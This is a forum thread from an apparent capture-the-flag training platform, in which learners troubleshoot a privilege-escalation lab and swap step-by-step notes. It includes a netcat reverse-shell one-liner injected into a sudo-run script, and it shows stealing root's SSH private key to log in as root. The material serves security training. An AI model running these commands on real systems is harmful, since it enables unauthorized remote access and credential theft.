Module - Getting Started - Privilege Escalation - Second question

@PoirsLJpHY
I think Sometimes the Kali machiene loses connection in between or something like that because when i try to use the PWN box it works fine i was able to clear task easily Or maybe there would have been an error by my side…

@TazWake
Since user2 had read access over root’s .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I’m getting ‘Connection timeout’ error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here’s the error, I tried all the users i.e., user1, user2, root. All giving same errors.

Type your comment> @SushWannaHack said:

@TazWake
Since user2 had read access over root’s .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I’m getting ‘Connection timeout’ error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here’s the error, I tried all the users i.e., user1, user2, root. All giving same errors.

It implies there isn’t a route to 178.62.61.23 - are you sure that is the correct IP address?

The error implies a networking issue. If you are confident the IP and port are correct, it would be worth troubleshooting with traceroute and maybe even nmap.

@TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

@SushWannaHack said:

@TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

I don’t know - I haven’t looked at this module.

What is the result of traceroute?

@TazWake , I finally resolved the issue and got the flag. I wasn’t able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

@SushWannaHack said:

@TazWake , I finally resolved the issue and got the flag. I wasn’t able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

Hey, if it works, it works.

Hey all,

So there is no .ssh folder in the root directory for me… Where would I find it?

@MoeSyzslak

The .ssh directory is typically a hidden directory.

i just wanted to note the mistakes i was making to save others an evening of coffee and head scratching… ----- at first i copied and pasted the ‘id_rsa’ file into Pluma (a notepad app). As a result the file type became a ‘ASCII text’ rather than a ‘OpenSSH private key’. (It all needs to be done in the shell) ----- secondly, once i had that correct, i was trying to logon as user@host_machine - that will just trigger a password request. You need to logon as root@host_machine ------ (and I also spent hours getting my head around the VIM registries - namely how to copy - sorry YANK - to clipboard… but that’s another story) Properly obvious to most but I’m new to Linux. I hope that saves a few people some hours!

1 Like

When you get error “connection refused” when connect from target host bash try next command:
ssh root@127.0.0.1 -p 80 -i <path_to_root_rsa>
I discovered that in /etc/ssh/sshd_config assigned port 80.
But i dont understand why connect from attack pc first time on port 32516 works, but then not. Somewhere should exists route table…
I think that first address which give us on site is like entry point, then we redirect to target pc and communicate with it direct.

1 Like

Thank you for this, I was using nano instead of vim. Not sure if that was why it wasn’t taking the key or not but once I deleted the key and re-wrote it with vim it worked just fine. On a side note, I forgot to chmod 600 on the second try but it worked anyways!!

Thanks again!

I know this was a long time ago, but I was wondering if you remember if you resolved the issue you had. Because I have the exact same issue now

Thanks for mentioning copying and pasting the contents of the file. I have been trying to use scp to transfer the file for a couple of hours.

I wanted to add my struggles and solutions to this helpful threat.

Like @johneverist I had run the command: cat id_rsa after which i highlighted, and copied into nano and saved locally as ‘id_rsa’

I then continued to get the invalid format error.

I tried copy/pasting into vim nano etc and hit a wall.

I used wc id_rsa to see that my id_rsa had missing characters and words. It turns out the id_rsa key INCLUDES the -----BEGIN OPENSSH PRIVATE KEY----- and -----END OPENSSH PRIVATE KEY-----

I didn’t find it fascinating, by copy pasting the key to local machine and ssh again to root using id_rsa; though also couldn’t find any other way too, to escalate priv from user2 directly.

spot on!! Kudos!!

HELLO, I need help with: Escalate privileges and submit the root.txt flag.
I have completed the following steps:
#at Nibbles
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.255 1234 >/tmp/f’ | tee -a monitor.sh
#ip my lhost is 10.10.14.255
/home/nibbler/personal/stuff**$** sudo /home/nibbler/personal/stuff/monitor.sh
#and at my lhost:
nc -lpv 1234
but i don’t have a session on port 1234.
thank yyy

What up @the_huu_VietNam
I suggest you use “sudo -l”, just like the “Nibbles” section of the module. You use echo to create a reverse shell which will be different for the knowledge check.

EXERCISE NOTES:
Prompt 1: SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.

  • ssh [given user]@[given ip] -p [given port number of target IP]
  • sudo -l
  • sudo -su user2
  • cd ~
  • ls
  • cat flag.txt

Prompt 2: Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’.

  • whoami
  • cat /root/.ssh/id_rsa
  • copy results
  • cd ~

On a new cmd console (not within user2 of target ip but a cmd on the hackthebox user home) :

  • vim id_rsa
  • paste contents into id_rsa

Note: You can delete lines with the shift + v for visual mode (should not need to complete exercise). Source: [How can I delete multiple lines in vi? - Stack Overflow]
(How can I delete multiple lines in vi? - Stack Overflow)

Note: You can also edit individual characters within the vim by pressing ‘i’ (should not need to complete exercise). Press esc to exit INSERT mode. Source: How To Edit A File Using Vim On A Linux System – Systran Box

Commands:

  • Compare cat of id_rsa to cat /root/.ssh/id_rsa

Note: You can also check the word-counts of both files with: wc /home/user2/id_rsa
Source: https://linuxize.com/post/linux-wc-command/

Commands:

  • chmod 600 id_rsa
  • ssh root@ -p -i id_rsa

Note: You do not need to provide a path to the file; this is most likely due to the fact the hackthebox homd cmd console not having a id_rsa file

Commands:

  • ls
  • cat flag.txt

Notable commands attempted during exercise (should not need to complete the exercise):
1). You can check your current directory in linux with: pwd

2). You can also cancel a bad command with: shift + z

1 Like